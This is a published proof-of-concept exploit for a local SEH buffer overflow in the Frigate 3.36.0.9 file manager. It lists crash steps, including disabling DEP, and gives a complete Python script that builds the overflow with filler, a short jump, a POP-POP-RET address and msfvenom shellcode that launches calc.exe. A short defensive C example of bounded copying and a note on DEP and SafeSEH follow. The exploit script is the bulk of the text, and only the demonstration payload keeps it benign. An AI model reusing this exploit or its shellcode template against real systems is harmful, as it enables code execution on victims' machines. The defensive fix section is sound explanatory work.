Published on June 9th, 2020

Frigate 3.36.0.9 – ‘Command Line’ Local Buffer Overflow (SEH) (PoC)


# Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) 
# Vendor Homepage: http://www.frigate3.com/ 
# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-07
# Vulnerable Software: Frigate
# Version: <= 3.36.0.9
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  

#Steps to Produce the Crash:

#   1.- Run python code: FrigateLCE.py
#   2.- Copy the content of FrigateLCE.txt to the clipboard
#   3.- Turn off DEP for Frigate3.exe
#   4.- Open "Frigate3.exe"
#   5.- Go to "Command" > "Command Line" > "Activate Command Line"
#   6.- Paste the clipboard into the "Command Line" field which appears at the bottom of the Frigate application.
#   7.- Press Enter on the keyboard.
#   8.- Click on OK in the dialog box that appears.
#   9.- Calc.exe runs.


#################################################################################################################################################

#Python "FrigateLCE.py" Code:

f = open("FrigateLCE.txt", "wb")   # write raw bytes so the payload is not re-encoded

junk = b"A" * 4112                 # filler up to the SEH record

nseh = b"\xeb\x20\x90\x90"         # next SEH: short jmp forward over the handler address

seh = b"\x4B\x0C\x01\x40"          # SEH handler: 0x40010C4B, little-endian

#40010C4B   5B               POP EBX
#40010C4C   5D               POP EBP
#40010C4D   C3               RETN
#POP EBX ,POP EBP, RETN | [rtl60.bpl]  (C:\Program Files\Frigate3\rtl60.bpl)

nops = b"\x90" * 50

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d"  -f python

buf =  b""
buf += b"\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b"
buf += b"\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18"
buf += b"\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f"
buf += b"\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63"
buf += b"\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5"
buf += b"\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac"
buf += b"\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee"
buf += b"\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21"
buf += b"\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc"
buf += b"\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb"
buf += b"\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33"
buf += b"\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae"
buf += b"\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f"
buf += b"\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10"
buf += b"\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6"
buf += b"\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1"
buf += b"\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05"

payload = junk + nseh + seh + nops + buf

f.write(payload)
f.close()
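The defect behind this advisory is a fixed-size buffer that receives command-line text without a length check, so a 4112-byte prefix reaches the SEH record. The following C snippet is an added, defender-side illustration and is not Frigate's code: it shows the bounded-copy pattern that closes this class of bug. The buffer size 4112 is an assumption taken from the PoC's junk length (the advisory does not state the real buffer layout), and every function name is hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size: mirrors the 4112-byte junk prefix in the PoC.
 * The real Frigate buffer layout is not known from the advisory. */
#define CMDLINE_MAX 4112

/*
 * Vulnerable shape (illustrative only, never compiled here):
 *
 *     char buf[CMDLINE_MAX];
 *     strcpy(buf, input);      // no length check: overruns buf, then the
 *                              // saved registers and the SEH record
 */

/* Hardened copy: refuse input that does not fit, including the NUL. */
int copy_command_line(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0)
        return -1;
    if (len >= dst_size) {
        dst[0] = '\0';          /* leave a well-formed empty string */
        return -1;              /* caller must treat this as a rejection */
    }
    memcpy(dst, src, len + 1);  /* copies the terminator too */
    return 0;
}

/* Hypothetical command-line handler: returns 1 if the line was accepted,
 * 0 if it was rejected for being too long. */
int handle_command_line(const char *input)
{
    char buf[CMDLINE_MAX];
    if (copy_command_line(buf, sizeof buf, input) != 0)
        return 0;
    /* ... dispatch the command held in buf ... */
    return 1;
}

/* Test helper: build a constructed input of n 'A' bytes (like the PoC's
 * junk) and report whether the handler accepts it. Returns -1 on OOM. */
int accepts_length(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return -1;
    memset(s, 'A', n);
    s[n] = '\0';
    int rc = handle_command_line(s);
    free(s);
    return rc;
}

int main(void)
{
    printf("len 100  accepted: %d\n", accepts_length(100));
    printf("len 4111 accepted: %d\n", accepts_length(4111));
    printf("len 4112 accepted: %d\n", accepts_length(4112));
    printf("len 8000 accepted: %d\n", accepts_length(8000));
    return 0;
}
```

The length check is the fix at the root; the mitigations the PoC has to work around are layered on top of it. Step 3 of the advisory (turning off DEP) shows that DEP alone would stop the NOP sled and shellcode from executing on the stack, and an SEH-overwrite technique depends on finding a handler address in a module loaded without SafeSEH, which is why such modules should not ship in a hardened build.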
            




